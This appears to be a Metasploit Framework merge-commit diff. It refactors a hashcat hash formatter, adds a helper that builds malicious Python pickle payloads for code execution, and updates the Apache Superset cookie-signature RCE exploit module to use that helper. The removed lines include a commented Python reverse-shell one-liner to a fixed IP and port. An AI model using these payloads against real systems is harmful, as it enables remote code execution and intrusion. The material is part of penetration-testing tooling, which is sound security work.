Merge pull request #25 from smcintyre-r7/pr/collab/18351

Pr/collab/18351

Author: h00die

lib/metasploit/framework/password_crackers/hashcat/formatter.rb

@@ -1,24 +1,3 @@
-# This method takes a string which is likely base64 encoded
-# however, there is an arbitrary amount of = missing from the end
-# so we attempt to add = until we are able to decode it
-#
-# @param str [String] the base64-ish string
-# @return [String] the corrected string
-private
-def add_equals_to_base64(str)
-  ['', '=', '=='].each do |equals|
-    begin
-      to_test = "#{str}#{equals}"
-      Base64.strict_decode64(to_test)
-      return to_test
-    rescue ArgumentError
-      nil
-    end
-  end
-  nil
-end
-
-
 # This method takes a {framework.db.cred}, and normalizes it
 # to the string format hashcat is expecting.
 # https://hashcat.net/wiki/doku.php?id=example_hashes
@@ -66,6 +45,24 @@ def hash_to_hashcat(cred)
 
       # https://hashcat.net/forum/thread-7854-post-42417.html#pid42417 ironically gives Token encoding exception
       c = cred.private.data.sub('$pbkdf2-sha256', 'sha256').split('$')
+
+      # This method takes a string which is likely base64 encoded
+      # however, there is an arbitrary amount of = missing from the end
+      # so we attempt to add = until we are able to decode it
+      #
+      # @param str [String] the base64-ish string
+      # @return [String] the corrected string
+      def add_equals_to_base64(str)
+        ['', '=', '=='].each do |equals|
+          to_test = "#{str}#{equals}"
+          Base64.strict_decode64(to_test)
+          return to_test
+        rescue ArgumentError
+          next
+        end
+        nil
+      end
+
       c[2] = add_equals_to_base64(c[2].gsub('.', '+')) # pad back out
       c[3] = add_equals_to_base64(c[3].gsub('.', '+')) # pad back out
       return c.join(':')
@@ -132,8 +129,6 @@ def hash_to_hashcat(cred)
     when /^krb5$/
       return cred.private.data.to_s
     end
-    
-    
   end
   nil
 end

lib/msf/util/python_deserialization.rb

@@ -0,0 +1,30 @@
+# -*- coding: binary -*-
+
+# Python deserialization Utility
+module Msf
+  module Util
+    # Python deserialization class
+    class PythonDeserialization
+      # That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
+      PAYLOADS = {
+        # this payload will work with Python 3.x targets to execute Python code in place
+        py3_exec: proc do |python_code|
+          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
+          %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
+        end
+      }
+
+      def self.payload(payload_name, command = nil)
+
+        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
+
+        PAYLOADS[payload_name.to_sym].call(command)
+      end
+
+      def self.payload_names
+        PAYLOADS.keys
+      end
+
+    end
+  end
+end

modules/exploits/linux/http/apache_superset_cookie_sig_rce.rb

@@ -273,6 +273,7 @@ def mount_internal_database
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Failed to mount the internal database: #{datastore['DATABASE']}") if res.code == 422
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response code (#{res.code})") unless res.code == 201
 
     j = res.get_json_document
@@ -460,26 +461,7 @@ def rce_implant
     # tell it we're about to submit a new query
     set_query_latest_query_id
 
-    # Here's the python of the payload pickle generator
-    # import pickle
-    # from binascii import hexlify
-    # import os
-    # import argparse
-    # import base64
-
-    # command = "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.255.200\",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
-
-    # class PickleRCE:
-    #        def __reduce__(self):
-    #          return os.system, (command,)
-
-    # payload = pickle.dumps(PickleRCE(), protocol=0)
-    # print(f'Raw Payload: {payload}')
-    # print()
-    # print(f'Hex: {hexlify(payload).decode()}')
-    pickled = %|cposix\nsystem\np0\n(V|
-    pickled << %(python -c "#{payload.encoded}"\np1\ntp2\nRp3\n.)
-    pickled = Rex::Text.to_hex(pickled)
+    pickled = Rex::Text.to_hex(Msf::Util::PythonDeserialization.payload(:py3_exec, payload.encoded))
     pickled = pickled.gsub('\x', '') # we only need a beginning \x not every character for this format
 
     vprint_status('Uploading payload')
@@ -520,7 +502,7 @@ def rce_implant
       'uri' => normalize_uri(target_uri.path, 'superset', 'dashboard', 'p', permalink_key, '/')
     )
     # we go through some permalink hell here
-    until res.headers['Location'].nil?
+    until res.nil? || res.headers['Location'].nil?
       res = send_request_cgi(
         'keep_cookies' => true,
         'cookie' => "session=#{@admin_cookie};",